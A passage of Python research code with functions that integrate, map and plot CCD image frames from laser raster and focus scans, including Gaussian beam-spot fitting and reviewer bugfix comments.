    fig_text='X-bounds: '+repr([l,r])+'\nY-bounds: '+repr([t,b])+'\nTotal Pixels: '+repr(np.size(pix[i,m.ceil(t):m.floor(b),m.ceil(l):m.floor(r)]))
    plt.text(.05,.05,fig_text,fontsize=10,bbox=bbox_props,va='bottom',ha='left',transform=ax.transAxes)
    plt.show()
    if savepath!=False:
        plt.savefig(savepath+'/'+str(date)+'_run'+str(filename)+'_int_plot.png')
    if store==True:
        return integral
#-----------------------------------------------------------------------------------------
def improf_0(filename,ax,bounds,**kwargs):
    """Collapse a run into 1-D profiles by summing over one axis.

    Parameters:
        filename -- integer run number
        ax       -- 'x': sum rows bounds[0]..bounds[1] for a profile vs x;
                    'y': sum columns bounds[0]..bounds[1] for a profile vs y
        bounds   -- 1-based [first, last] rows/columns to include
    Keyword arguments:
        lvscale  -- if True (default) divide each frame by its laser energy
        T_R      -- transmission factor forwarded to lv_energy
        plot     -- if True, plot every frame's profile

    Returns the (N, profile-length) array of profiles.
    """
    lvscale=kwargs.get('lvscale',True)
    T_R=kwargs.get('T_R',1.)
    plot=kwargs.get('plot',False)
    import numpy as np
    import matplotlib.pyplot as plt
    # Read in the file
    x,y,pix,x_max,y_max,N,run=im_sub_dark(filename,speed='slow')
    # Scale by energy.  lv_energy re-reads the LabView log, and its result
    # is loop-invariant: fetch it once instead of once per frame.
    if lvscale==True:
        energies=lv.lv_energy(filename,T_R=T_R)
        for i in range(np.shape(pix)[0]):
            pix[i,:,:]=pix[i,:,:]/(1e3*energies[i])
    # Integrate in one axis to form profile
    if ax=='x':
        prof=np.sum(pix[:,bounds[0]-1:bounds[1],:],axis=1)
    if ax=='y':
        prof=np.sum(pix[:,:,bounds[0]-1:bounds[1]],axis=2)
    # plot the profile
    if plot==True:
        plt.figure('profile')
        plt.clf()
        for i in range(np.shape(prof)[0]):
            plt.plot(prof[i,:],label='frame '+str(i+1))
        plt.legend(fontsize=11)
        plt.show()
    return prof
#-----------------------------------------------------------------------------------------
# Function to integrate each frame in the scan and make a 2d plot
def scan_plot(filename,lvnum,center,width,stepsize,numsteps,**kwargs):
    """Integrate a moving box that follows a rastered scan; build a 2-D map.

    The box starts centered at ``center`` (pixels) with size ``width`` and
    walks with the scan: ``stepsize`` microns per step (5 micron/pixel),
    ``numsteps``=[nx, ny] in a serpentine raster.  Each frame's integral is
    normalized by the LabView power log ``lvnum`` and folded into an
    (ny, nx) map.  Returns (integral2d, bounds) when store=True.
    """
    # Define keyword arguments
    colmap=kwargs.get('cmap','jet')
    frames=kwargs.get('frames','all')
    bgfile=kwargs.get('bgfile',False)
    plt_rect=kwargs.get('plt_rect',True)
    savepath=kwargs.get('savepath',False)
    store=kwargs.get('store',True)
    overlay=kwargs.get('overlay',False)
    lab=kwargs.get('label','default')
    scale=kwargs.get('bg_scale',1.)
    shift=kwargs.get('bg_shift',[0,0])
    bgframe=kwargs.get('bg_frame','ave')
    xylim=kwargs.get('axis','default')
    zscale=kwargs.get('z_scale','default')
    # Import modules for array and plotting
    import numpy as np
    import matplotlib.pyplot as plt
    import utility as ut
    import lv_analysis as lv
    if bgfile==False:
        # im_sub_dark requires the readout speed; the original call omitted
        # it and raised TypeError
        x,y,pix,x_max,y_max,N,run=im_sub_dark(filename,'slow')
    else:
        # Import data and background-subtract with im_sub
        if frames!='all':
            frames=np.array(frames)-1
        x,y,pix,x_max,y_max,N,run=im_sub(filename,bgfile,bg_scale=scale,bg_shift=shift,bg_frame=bgframe,frames=frames)
    # Make a box centered at some pixel to integrate
    bounds=np.zeros((N,4))
    bounds[0,:]=[center[0]-.5*width[0],center[0]+.5*width[0],center[1]-.5*width[1],center[1]+.5*width[1]]
    xinc,xdir,ymoved=0,1,0
    # 5 micron per pixel
    stepsizepix=np.array(stepsize)/5.
    for i in range(N):
        if i==0:
            continue
        if xinc==numsteps[0]-1:
            # End of a row: step in y and reverse the x direction
            bounds[i,:]=[bounds[i-1,0],bounds[i-1,1],bounds[i-1,2]+stepsizepix[1],bounds[i-1,3]+stepsizepix[1]]
            ymoved=1
            xdir=xdir*-1
        if xinc<numsteps[0]-1:
            bounds[i,:]=[bounds[i-1,0]+xdir*stepsizepix[0],bounds[i-1,1]+xdir*stepsizepix[0],bounds[i-1,2],bounds[i-1,3]]
            xinc+=1
        if ymoved==1:
            ymoved,xinc=0,0
    # Integrate over the bounds (fractional edge pixels weighted by the
    # area they cover)
    xbounds=bounds[:,:2]-1
    ybounds=bounds[:,-2:]-1
    # Cast the inner-edge indices to int: numpy rejects float indices
    # (np.ceil returns floats, which crashed the indexing below)
    xbounds_i=np.ceil(xbounds).astype(int)
    ybounds_i=np.ceil(ybounds).astype(int)
    xbounds_f=xbounds-np.floor(xbounds)
    ybounds_f=ybounds-np.floor(ybounds)
    integral=np.zeros((N,),dtype=float)
    for i in range(N):
        fullpix=np.sum(pix[i,ybounds_i[i,0]+1:ybounds_i[i,1],xbounds_i[i,0]+1:xbounds_i[i,1]])
        sidepixl=(1-xbounds_f[i,0])*np.sum(pix[i,ybounds_i[i,0]+1:ybounds_i[i,1],xbounds_i[i,0]])
        sidepixr=xbounds_f[i,1]*np.sum(pix[i,ybounds_i[i,0]+1:ybounds_i[i,1],xbounds_i[i,1]])
        sidepixb=(1-ybounds_f[i,0])*np.sum(pix[i,ybounds_i[i,0],xbounds_i[i,0]+1:xbounds_i[i,1]])
        sidepixt=ybounds_f[i,1]*np.sum(pix[i,ybounds_i[i,1],xbounds_i[i,0]+1:xbounds_i[i,1]])
        cornerbl=(1-xbounds_f[i,0])*(1-ybounds_f[i,0])*pix[i,ybounds_i[i,0],xbounds_i[i,0]]
        cornertl=(1-xbounds_f[i,0])*ybounds_f[i,1]*pix[i,ybounds_i[i,1],xbounds_i[i,0]]
        cornertr=xbounds_f[i,1]*ybounds_f[i,1]*pix[i,ybounds_i[i,1],xbounds_i[i,1]]
        cornerbr=xbounds_f[i,1]*(1-ybounds_f[i,0])*pix[i,ybounds_i[i,0],xbounds_i[i,1]]
        integral[i]=fullpix+sidepixl+sidepixr+sidepixt+sidepixb+cornerbl+cornertl+cornerbr+cornertr
    # Power scale
    integral=integral/lv.get_pow(lvnum)
    # Plot the frames desired
    for frame in range(1,N+1):
        plt.figure('int_area_scan')
        plt.clf()
        im=plt.imshow(pix[(frame-1),:,:],cmap=colmap,interpolation='nearest')
        plt.colorbar(im,orientation='vertical')
        plt.title(run+': frame '+repr(frame))
        plt.xlabel('x Pixel')
        plt.ylabel('y Pixel')
        # want to start at beginning of first bound, and end of last bound
        plt.axis([x[0]-.5,x[-1]+.5,y[0]-.5,y[-1]+.5])
        ut.rect(bounds[frame-1,:])
        # put pixel number at far pixel edge, instead of middle
        plt.xticks(np.arange(np.shape(pix)[2])+.5,np.arange(np.shape(pix)[2]))
        plt.yticks(np.arange(np.shape(pix)[1])+.5,np.arange(np.shape(pix)[1]))
        if xylim!='default':
            plt.axis(xylim)
        plt.clim(0,1.05*np.amax(pix))
        if zscale!='default':
            plt.clim(zscale)
        plt.show()
        # Zero-pad the frame number to three digits
        if frame<=9:
            framestr='00'+str(frame)
        if 10<=frame<=99:
            framestr='0'+str(frame)
        if 100<=frame:
            framestr=str(frame)
        if savepath!=False:
            ut.create_dir(savepath)
            plt.savefig(savepath+'/'+run+'_'+framestr+'_int_area.png')
    # Create integral map in 2d
    integral2d=integral.reshape(np.flipud(numsteps))
    # Flip every other row since scan is rasterized
    for i in range(numsteps[1]):
        if i%2==1:
            integral2d[i,:]=np.flipud(integral2d[i,:])
    # Plot integral map
    if lab=='default':
        lab=run
    if overlay==False:
        plt.figure(run+'_int2d')
    if overlay==True:
        plt.figure('int2d')
        plt.clf()
    im=plt.imshow(integral2d,cmap=colmap,interpolation='nearest',extent=[0,numsteps[0]*stepsize[0],0,numsteps[1]*stepsize[1]])
    plt.colorbar(im,orientation='vertical')
    plt.title(run+'Integral Scan')
    plt.xlabel('x location (micron)')
    plt.ylabel('y location (micron)')
    if zscale!='default':
        plt.clim(zscale)
    plt.show()
    if savepath!=False:
        plt.savefig(savepath+'/'+run+'_intscan.png')
    if store==True:
        return integral2d,bounds
#------------------------------------------------------------------------------------------
# Function to integrate each frame in the scan and make a 2d plot
def scanplot_static(filename,bounds,numsteps,**kwargs):
    """Integrate a fixed region in every frame of a rastered scan and fold
    the per-frame integrals into a 2-D (numsteps) map.

    ``filename`` may be an integer run number or an already-loaded
    (N, y, x) pixel array (supply ``run`` for labeling).  ``bounds`` is a
    fixed [l, r, t, b] region; ``drop`` lists 1-based frames replaced by a
    sentinel value of 50 so the raster keeps its shape; ``lv`` names a
    LabView power log used for normalization.

    Returns the 2-D integral map when store=True.
    """
    # Define keyword arguments
    colmap=kwargs.get('cmap','jet')
    plt_rect=kwargs.get('plt_rect',True)
    savepath=kwargs.get('savepath',False)
    store=kwargs.get('store',True)
    xylim=kwargs.get('axis','default')
    zscale=kwargs.get('z_scale','default')
    manrun=kwargs.get('run','expXXX_YYY')
    lvnum=kwargs.get('lv','none')
    T_R=kwargs.get('T_R',1.)
    drop=kwargs.get('drop',[])
    sap=kwargs.get('sapphire',False)
    dark=kwargs.get('dark',False)
    # Import modules for array and plotting
    import numpy as np
    import matplotlib.pyplot as plt
    import utility as ut
    import lv_analysis as lv
    if sap==True:
        # Sapphire-substrate data gets its own output directory
        savepath=savepath[:-1]
        savepath+='_sapphire/'
        ut.create_dir(savepath)
    # Import data and remove cosmics (dark-subtracted)
    if isinstance(filename,int)==True:
        x,y,pix,x_max,y_max,N,run=im_sub_dark(filename,'slow',dark=dark)
    # If already imported, just use array
    if isinstance(filename,np.ndarray)==True:
        pix=filename
        N=np.shape(pix)[0]
        run=manrun
    # Integrate the data in the bounds and plot the data and box
    integral=[]
    for i in range(N):
        integral.append(ut.integrate(pix[i,:,:],bounds,boundtype='edge'))
        if i+1 in drop:
            # Dropped frames are removed here; sentinel values are appended
            # below so the raster map keeps its shape
            integral.pop(-1)
        if plt_rect==True and savepath!=False:
            plt.figure('int_area')
            plt.clf()
            im=plt.imshow(pix[i,:,:],cmap=colmap,interpolation='nearest')
            plt.colorbar(im,orientation='vertical')
            plt.title(run+': frame '+repr(i+1))
            plt.xlabel('x Pixel')
            plt.ylabel('y Pixel')
            ut.rect(bounds)
            # Apply the axis limits after the rectangle is drawn (the
            # original duplicated this check before and after ut.rect)
            if xylim!='default':
                plt.axis(xylim)
            plt.show()
            if savepath!=False:
                # Zero-pad the frame number to three digits
                if (i+1)<=9:
                    framestr='00'+str(i+1)
                if 10<=(i+1)<=99:
                    framestr='0'+str(i+1)
                if 100<=(i+1):
                    framestr=str(i+1)
                plt.savefig(savepath+'/'+str(date)+'_run'+str(filename)+'_'+framestr+'_int_area.png')
    # Convert before the array operations below.  When drop was empty and
    # no power scaling was requested, the original left 'integral' a plain
    # list and .reshape raised AttributeError (the sibling scanplot_fixed
    # already has this conversion).
    integral=np.array(integral,dtype=float)
    for i in drop:
        # Sentinel value for each dropped frame
        integral=np.append(integral,50)
    if lvnum!='none':
        # Normalize by the per-frame laser power
        pows=lv.lv_pow(lvnum,T_R=T_R)
        for i in drop:
            pows=np.insert(pows,i,pows[i])
        integral=integral/(np.absolute(pows)*1E3)
    if len(drop)!=0:
        # Exclude the appended sentinels from the minimum search
        intmin,intminf=np.amin(integral[:-len(drop)]),np.argmin(integral[:-len(drop)])+1
    if len(drop)==0:
        intmin,intminf=np.amin(integral),np.argmin(integral)+1
    print(drop)
    print(intmin,intminf)
    # Create integral map in 2d
    integral2d=integral.reshape(np.flipud(numsteps))
    # Flip every other row since scan is rasterized
    for i in range(numsteps[1]):
        if i%2==1:
            integral2d[i,:]=np.flipud(integral2d[i,:])
    # Plot integral map
    plt.figure('int2d')
    plt.clf()
    im=plt.imshow(integral2d,cmap=colmap,interpolation='nearest',origin='lower')
    cb=plt.colorbar(im,orientation='vertical')
    cb.formatter.set_powerlimits((0, 0))
    cb.update_ticks()
    plt.title(run+' Integral Scan')
    plt.xlabel('x step')
    plt.ylabel('y step')
    ut.textbox('Minimum: '+str(int(intmin))+', frame: '+str(intminf),[.05,.95])
    if zscale!='default':
        plt.clim(zscale)
    plt.show()
    if savepath!=False:
        plt.savefig(savepath+'/'+str(date)+'_run'+str(filename)+'_intscan_static.png')
    if store==True:
        return integral2d
#------------------------------------------------------------------------------------------
# Function to integrate each frame in the scan and make a 2d plot
def scanplot_fixed(filename,startpos,stepsize,numsteps,**kwargs):
    """Integrate a box that walks with a rastered scan (fixed step pattern).

    ``filename`` is an integer run number or an already-loaded (N, y, x)
    array (supply ``run`` for labeling).  The box starts centered at
    ``startpos`` (pixels) with size ``intsize`` and moves ``stepsize``
    microns per step (5 micron/pixel) over a serpentine ``numsteps``=[nx, ny]
    raster.  ``drop`` lists 1-based frames to exclude (replaced by a
    sentinel value of 50); ``lv`` names a LabView energy log used for
    normalization.

    Returns (integral2d, bounds, integral) when store=True.
    """
    # Define keyword arguments
    colmap=kwargs.get('cmap','jet')
    plt_rect=kwargs.get('plt_rect',True)
    savepath=kwargs.get('savepath',False)
    store=kwargs.get('store',True)
    xylim=kwargs.get('axis','default')
    zscale=kwargs.get('z_scale','default')
    intsize=kwargs.get('intsize',[5,5])
    manrun=kwargs.get('run','expXXX_YYY')
    lvnum=kwargs.get('lv','none')
    T_R=kwargs.get('T_R',1.)
    drop=kwargs.get('drop',[])
    sap=kwargs.get('sapphire',False)
    dark=kwargs.get('dark',False)
    pixscale=kwargs.get('pixscale','default')
    cs=kwargs.get('checkstart',False)
    # Import modules for array and plotting
    import numpy as np
    import matplotlib.pyplot as plt
    import utility as ut
    import os
    import gen_reader as gr
    from lmfit import minimize,Parameters,Parameter,Model
    import lv_analysis as lv
    if sap==True:
        # Sapphire-substrate data gets its own output directory.
        # NOTE(review): the framedata directory is only created in this
        # branch -- confirm frame-data saving works for non-sapphire runs
        savepath=savepath[:-1]
        savepath+='_sapphire/'
        ut.create_dir(savepath)
        ut.create_dir(savepath+'framedata')
    # Import data and remove cosmics with image_remove_cosmics
    if isinstance(filename,int)==True:
        x,y,pix,x_max,y_max,N,run=im_sub_dark(filename,'slow',dark=dark)
    # If already imported, just use array
    if isinstance(filename,np.ndarray)==True:
        pix=filename
        N=np.shape(pix)[0]
        run=manrun
    # Make a box centered at some pixel to integrate
    bounds=np.zeros((N,4))
    bounds[0,:]=[startpos[0]-.5*intsize[0],startpos[0]+.5*intsize[0],startpos[1]-.5*intsize[1],startpos[1]+.5*intsize[1]]
    if sap==True:
        # Sapphire images sit 12 pixels lower on the detector
        bounds[0,2:]=bounds[0,2:]-12
    xinc,xdir,ymoved=0,1,0
    # 5 micron per pixel
    stepsizepix=np.array(stepsize)/5.
    for i in range(N):
        if i==0:
            continue
        if i+1 in drop:
            # Dropped frames keep the previous box position
            bounds[i,:]=bounds[i-1,:]
            continue
        if xinc==numsteps[0]-1:
            # End of a row: step in y and reverse the x direction
            bounds[i,:]=[bounds[i-1,0],bounds[i-1,1],bounds[i-1,2]+stepsizepix[1],bounds[i-1,3]+stepsizepix[1]]
            ymoved=1
            xdir=xdir*-1
        if xinc<numsteps[0]-1:
            bounds[i,:]=[bounds[i-1,0]+xdir*stepsizepix[0],bounds[i-1,1]+xdir*stepsizepix[0],bounds[i-1,2],bounds[i-1,3]]
            xinc+=1
        if ymoved==1:
            ymoved,xinc=0,0
    # Integrate the data in the bounds and plot the data and box
    integral=[]
    for i in range(N):
        integral.append(ut.integrate(pix[i,:,:],bounds[i,:],boundtype='edge'))
        if i+1 in drop:
            # Remove dropped frames; sentinel values are appended below
            integral.pop(-1)
        if plt_rect==True and savepath!=False:
            plt.figure('int_area')
            plt.clf()
            im=plt.imshow(pix[i,:,:],cmap=colmap,interpolation='nearest')
            plt.colorbar(im,orientation='vertical')
            plt.title(run+': frame '+repr(i+1))
            plt.xlabel('x Pixel')
            plt.ylabel('y Pixel')
            if xylim!='default':
                plt.axis(xylim)
            ut.rect(bounds[i,:])
            if pixscale!='default':
                plt.clim(pixscale)
            plt.show()
            if savepath!=False:
                # Zero-pad the frame number to three digits
                if (i+1)<=9:
                    framestr='00'+str(i+1)
                if 10<=(i+1)<=99:
                    framestr='0'+str(i+1)
                if 100<=(i+1) :
                    framestr=str(i+1)
                plt.savefig(savepath+'/'+str(date)+'_run'+str(filename)+'_'+framestr+'_int_area.png')
                # NOTE(review): slicing with xylim assumes 'axis' was given
                # as integer pixel bounds -- fails if left at 'default'
                ut.save(np.ravel(pix[i,xylim[2]:xylim[3],xylim[0]:xylim[1]]),['data'],savepath+'framedata/'+str(date)+'_run'+str(filename)+'_'+framestr+'.txt')
    if cs==True:
        # Quick look at the starting box position on the first frame
        plt.figure('start')
        plt.clf()
        plt.imshow(pix[0,:,:],cmap=colmap,interpolation='nearest')
        ut.rect(bounds[0,:])
        if xylim!='default':
            plt.axis(xylim)
        plt.show()
    integral=np.array(integral)
    for i in drop:
        # Sentinel value for each dropped frame so the map keeps its shape
        integral=np.append(integral,50)
    if lvnum!='none':
        # Normalize by the per-frame laser energy
        pows=lv.lv_energy(lvnum,T_R=T_R)
        for i in drop:
            pows=np.insert(pows,i,pows[i])
        integral=integral/(np.absolute(pows)*1E3)
    if len(drop)!=0:
        # Exclude the appended sentinels from the minimum search
        intmin,intminf=np.amin(integral[:-len(drop)]),np.argmin(integral[:-len(drop)])+1
    if len(drop)==0:
        intmin,intminf=np.amin(integral),np.argmin(integral)+1
    print(drop)
    print(intmin,intminf)
    # Create integral map in 2d
    integral2d=integral.reshape(np.flipud(numsteps))
    # Flip every other row since scan is rasterized
    for i in range(numsteps[1]):
        if i%2==1:
            integral2d[i,:]=np.flipud(integral2d[i,:])
    # Plot integral map
    plt.figure('int2d')
    plt.clf()
    im=plt.imshow(integral2d,cmap=colmap,interpolation='nearest',origin='lower')
    cb=plt.colorbar(im,orientation='vertical')
    cb.formatter.set_powerlimits((0, 0))
    cb.update_ticks()
    plt.title(run+' Integral Scan '+str(intsize[0])+'x'+str(intsize[1]))
    plt.xlabel('x step')
    plt.ylabel('y step')
    #ut.textbox('Minimum: '+str(int(intmin))+', frame: '+str(intminf),[.05,.95])
    if zscale!='default':
        plt.clim(zscale)
    plt.show()
    if savepath!=False:
        plt.savefig(savepath+'/'+str(date)+'_run'+str(filename)+'_intscan_'+str(intsize[0])+'x'+str(intsize[1])+'.png')
        ut.save(np.array([startpos[0],startpos[1],stepsize[0],stepsize[1],intmin,intminf]),['xstart','ystart','xstep','ystep','minimum','min frame'],savepath+'/'+str(date)+'_run'+str(run)+'_scandata.txt')
    if store==True:
        return integral2d,bounds,integral
#------------------------------------------------------------------------------------------
# Function to integrate each frame in the scan and make a 2d plot
def scanplot_fit(filename,fitbnds,stepsize,numsteps,**kwargs):
    """Scan analysis that tracks the beam spot by fitting a 2-D Gaussian.

    Each frame is fit inside fitbnds=[x0, x1, y0, y1] (pixels); a square
    region of side ``intsize`` around the fitted center is integrated, and
    the per-frame integrals are folded into a 2-D raster map.

    Returns (integral2d, param_all, integral): the 2-D map, the fitted
    (x, y) centers per frame, and the flat integral array.
    """
    # Define keyword arguments
    colmap=kwargs.get('cmap','jet')
    plt_rect=kwargs.get('plt_rect',True)
    savepath=kwargs.get('savepath','/home/chris/anaconda/plots/'+str(date))
    store=kwargs.get('store',True)
    xylim=kwargs.get('axis','default')
    zscale=kwargs.get('z_scale','default')
    intsize=kwargs.get('intsize',3.)
    # Import modules for array, plotting and fitting
    import numpy as np
    import matplotlib.pyplot as plt
    import utility as ut
    from lmfit import Model
    # Import data and remove cosmics (dark-subtracted)
    x,y,pix,x_max,y_max,N,run=im_sub_dark(filename,'slow')
    # Slice data for just fit bounds; x/y become absolute pixel coordinates
    # inside the slice
    pixslice=pix[:,fitbnds[2]:fitbnds[3],fitbnds[0]:fitbnds[1]]
    x,y=np.arange(fitbnds[0],fitbnds[1]),np.arange(fitbnds[2],fitbnds[3])
    # Define 2d gaussian, flattened so lmfit can compare to raveled data.
    # np.meshgrid(x,y) returns (x-grid, y-grid), so 'my' varies with x and
    # 'mx' with y; the exponents pair them with the matching centers.
    def gauss2d_flat(x,y,amp,xcenter,ycenter,xwidth,ywidth): # This ends up as f(y,x)
        my,mx=np.meshgrid(x,y)
        xwidth,ywidth=xwidth/2.,ywidth/2.
        return np.ravel(amp*np.exp(-2*(np.square(mx-ycenter)/(np.square(ywidth))))*np.exp(-2*(np.square(my-xcenter))/(np.square(xwidth))))
    # Find the peak of every frame and integrate the region around it
    integral,param_all=[],[]
    p0=[100,np.mean([fitbnds[0],fitbnds[1]]),np.mean([fitbnds[2],fitbnds[3]]),4,4]
    p_0s=['amp','xcenter','ycenter','xwidth','ywidth']
    func_model=Model(gauss2d_flat,independent_vars=['x','y'],param_names=p_0s)
    for i in range(N):
        # Fit the sliced frame.  (The original referenced the misspelled
        # 'pixsclice' and an undefined 'data', both NameErrors.)
        frame_data=pixslice[i,:,:]
        result=func_model.fit(np.ravel(frame_data),x=x,y=y,amp=p0[0],xcenter=p0[1],ycenter=p0[2],xwidth=p0[3],ywidth=p0[4],verbose=False)
        center=[result.best_values['xcenter'],result.best_values['ycenter']]
        param_all.append(center)
        # Integrate around the fitted center, shifted into slice-relative
        # coordinates to match frame_data
        integral.append(ut.integrate(frame_data,[center[0]-fitbnds[0],center[1]-fitbnds[2],intsize,intsize]))
        if plt_rect==True:
            plt.figure('int_area')
            plt.clf()
            # Show the full frame; the box uses absolute pixel coordinates
            im=plt.imshow(pix[i,:,:],cmap=colmap,interpolation='nearest')
            plt.colorbar(im,orientation='vertical')
            plt.title(run+': frame '+repr(i+1))
            plt.xlabel('x Pixel')
            plt.ylabel('y Pixel')
            ut.rect([center[0]-intsize/2.,center[0]+intsize/2.,center[1]-intsize/2.,center[1]+intsize/2.])
            if xylim!='default':
                plt.axis(xylim)
            if zscale!='default':
                plt.clim(zscale)
            plt.show()
            # Zero-pad the frame number to three digits
            if (i+1)<=9:
                framestr='00'+str(i+1)
            if 10<=(i+1)<=99:
                framestr='0'+str(i+1)
            if 100<=(i+1):
                framestr=str(i+1)
            plt.savefig(savepath+'/'+str(date)+'_run'+str(filename)+'_'+framestr+'_int_area.png')
    param_all=np.array(param_all)
    integral=np.array(integral)
    # Create integral map in 2d
    integral2d=integral.reshape(np.flipud(numsteps))
    # Flip every other row since scan is rasterized
    for i in range(numsteps[1]):
        if i%2==1:
            integral2d[i,:]=np.flipud(integral2d[i,:])
    # Plot integral map
    plt.figure('int2d')
    plt.clf()
    im=plt.imshow(integral2d,cmap=colmap,interpolation='nearest')
    plt.colorbar(im,orientation='vertical')
    plt.title(run+'Integral Scan')
    plt.xlabel('x step ('+str(stepsize)+' micron)')
    plt.ylabel('y step ('+str(stepsize)+' micron)')
    if zscale!='default':
        plt.clim(zscale)
    plt.show()
    plt.savefig(savepath+'/'+str(date)+'_run'+str(filename)+'_intscan.png')
    # Plot center positions
    plt.figure('center_pos')
    plt.clf()
    plt.plot(param_all[:,0],param_all[:,1],'b-o')
    plt.title(run+'Center Fit Positions')
    plt.xlabel('x position (pixel)')
    plt.ylabel('y position (pixel)')
    plt.show()
    plt.savefig(savepath+'/'+str(date)+'_run'+str(filename)+'_centerpos.png')
    if store==True:
        return integral2d,param_all,integral
#------------------------------------------------------------------------------------------
# Function to plot 1st order images
def image_plot_1(filename,**kwargs):
    """Plot 1st-order (spectral) images with a wavelength x-axis.

    Keyword arguments:
        cmap         -- matplotlib colormap name
        disp_cosmics -- forwarded to the cosmic-removal reader
        frames       -- 'all' or a list of 1-based frames to plot
        diff_frames  -- True: one figure per frame; False: shared figure
        bgfile       -- background run number, or False for plain import

    NOTE(review): the readers in this module return pixel-index axes; the
    wavelength labeling assumes a calibrated first axis -- confirm.
    """
    # Define keyword arguments
    colmap=kwargs.get('cmap','jet')
    dc=kwargs.get('disp_cosmics',False)
    frames=kwargs.get('frames','all')
    df=kwargs.get('diff_frames',False)
    # The original stored this kwarg in 'sub' but tested 'bgfile' (NameError)
    bgfile=kwargs.get('bgfile',False)
    # Import modules for array and plotting
    import numpy as np
    import matplotlib.pyplot as plt
    if bgfile==False:
        # Import data and remove cosmics.  ('im_remove_cosmics' does not
        # exist in this module; use the reader that does.)
        wavelength,y,pix,wave_max,y_max,N,run=im_remove_cosmics_old(filename,'image',dc)
    else:
        # Background subtraction.  (im_sub takes no disp_cosmics argument;
        # the original passed dc positionally and crashed.)
        wavelength,y,pix,wave_max,y_max,N,run=im_sub(filename,bgfile)
    # Calculate the aspect ratio based on the size and number of pixels
    extent=[wavelength[0],wavelength[-1],1,y_max]
    # Calculate the length/pixel in wavelength and y directions
    dx=(wavelength[-1]-wavelength[0])/float(wave_max)
    dy=(y[-1]-y[0])/float(y_max)
    aspect_ratio=dx/dy
    if frames=='all':
        frames=range(1,N+1)
    # Plot the frames desired
    if df==True:
        for frame in frames:
            # One fresh figure per frame.  (The original passed the aspect
            # ratio as the figure number / figsize, which is invalid.)
            plt.figure()
            im=plt.imshow(pix[(frame-1),:,:],extent=extent,aspect=aspect_ratio,cmap=colmap,interpolation='nearest')
            plt.colorbar(im,orientation='vertical')
            plt.title(run+': frame '+repr(frame))
            plt.xlabel('Wavelength (nm)')
            plt.ylabel('y Pixel')
            plt.axis([wavelength[0],wavelength[-1],y[0],y[-1]])
            plt.show()
    if df==False:
        # All frames drawn on one shared figure
        plt.figure()
        for frame in frames:
            im=plt.imshow(pix[(frame-1),:,:],extent=extent,aspect=aspect_ratio,cmap=colmap,interpolation='nearest',label='Frame '+repr(frame))
            plt.colorbar(im,orientation='vertical')
        plt.title(run)
        plt.xlabel('Wavelength (nm)')
        plt.ylabel('y Pixel')
        plt.axis([wavelength[0],wavelength[-1],y[0],y[-1]])
        plt.legend()
        plt.show()
#-----------------------------------------------------------------------------------------
# Function to plot integrated 1st order images (turn them into spectra)
def image_int_1(filename,bounds,**kwargs):
    """Integrate 1st-order images over a y-pixel band and plot them as spectra.

    Parameters
    ----------
    filename : run identifier handed to the import helpers.
    bounds : [y_start, y_stop] row indices summed over to build each spectrum.

    Keyword args: disp_cosmics (False); frames ('all' or a list of 1-based
    frame numbers); diff_frames (True: one figure per frame, False: overlay);
    bgfile (False: no background run, otherwise a run to subtract).
    """
    # Define keyword arguments (define frames later)
    dc=kwargs.get('disp_cosmics',False)
    frames=kwargs.get('frames','all')
    df=kwargs.get('diff_frames',False)
    # BUGFIX: the kwarg was stored in 'sub' but tested as 'bgfile' below,
    # which raised NameError on every call
    bgfile=kwargs.get('bgfile',False)
    # Import modules for array and plotting
    import numpy as np
    import matplotlib.pyplot as plt
    import utility as u
    if bgfile==False:
        # Import data and remove cosmics with image_remove_cosmics
        wavelength,y,pix,wave_max,y_max,N,run=image_remove_cosmics(filename,'image',dc)
    else:
        # Import data, remove cosmics, and background subtract with image_sub
        wavelength,y,pix,wave_max,y_max,N,run=image_sub(filename,bgfile,disp_cosmics=dc)
    # Integrate over bounds (sum along the y axis of each frame)
    pix_int=np.sum(pix[:,bounds[0]:bounds[1],:],1)
    if frames=='all':
        frames=range(1,N+1)
    # Plot the frames desired
    if df==True:
        for frame in frames:
            fig_new=plt.figure()
            plt.plot(wavelength,pix_int[(frame-1),:])
            plt.title(run+': frame '+repr(frame)+' ROI: '+repr(bounds))
            plt.xlabel('Wavelength (nm)')
            plt.ylabel('Counts in ROI')
            plt.axis([wavelength[0],wavelength[-1],0,1.25*np.amax(pix_int[(frame-1),:])])
            plt.show()
    if df==False:
        fig=plt.figure()
        max_counts=[]
        for frame in frames:
            plt.plot(wavelength,pix_int[(frame-1),:],label='Frame '+repr(frame))
            max_counts.append(np.amax(pix_int[(frame-1),:]))
        plt.title(run+' ROI: '+repr(bounds))
        plt.xlabel('Wavelength (nm)')
        plt.ylabel('Counts in ROI')
        plt.axis([wavelength[0],wavelength[-1],0,1.25*np.amax(np.array(max_counts))])
        plt.legend()
        plt.show()
#-----------------------------------------------------------------------------------------
# Function to get laser profile from images (zinfo=[start,step])
def focus_find(filelist,bounds,zinfo,**kwargs):
    """Extract laser beam widths from a focus scan and plot them vs z.

    Each entry of *filelist* is loaded with im_sub_dark, cropped to
    *bounds* = [x0,x1,y0,y1], and fit with a 2D gaussian; the x and y 1/e^2
    widths (x5 to convert pixel -> micron) are plotted against the micrometer
    positions generated from *zinfo* = [start, step].
    Keyword args: savepath, fig (currently unused), speed, store.
    Returns (z, widths) when store=True.
    """
    savepath=kwargs.get('savepath',False)
    fig=kwargs.get('fig','')
    speed=kwargs.get('speed','slow')
    store=kwargs.get('store',False)
    # Import modules
    import numpy as np
    import matplotlib.pyplot as plt
    import math
    from scipy.optimize import curve_fit
    import os
    import utility as ut
    if savepath!=False:
        ut.create_dir(savepath)
    # Load every run; keep only the first frame, cropped to the fit bounds
    frames_loaded=[]
    for run_file in filelist:
        x,y,pix,x_max,y_max,N,run=im_sub_dark(run_file,speed=speed)
        frames_loaded.append(pix)
    frames_loaded=np.array(frames_loaded)[:,0,bounds[2]:bounds[3],bounds[0]:bounds[1]]
    x,y=x[bounds[0]:bounds[1]],y[bounds[2]:bounds[3]]
    # 2D gauss fit per file; row 0 holds x widths, row 1 holds y widths
    n_files=np.shape(frames_loaded)[0]
    widths=np.zeros((2,n_files))
    for idx in range(n_files):
        fit_result=ut.gaussfit2d(frames_loaded[idx,:,:],x,y,[100,np.median(x),np.median(y),4,4])
        widths[:,idx]=[fit_result['xwidth'],fit_result['ywidth']]
    # Micrometer positions for each file, then width-vs-position plot
    z=np.arange(zinfo[0],zinfo[0]+len(filelist)*zinfo[1],zinfo[1])
    plt.figure('beam_profs')
    plt.clf()
    plt.plot(z,5*widths[0,:],'bo',label='x profile')
    plt.plot(z,5*widths[1,:],'ro',label='y profile')
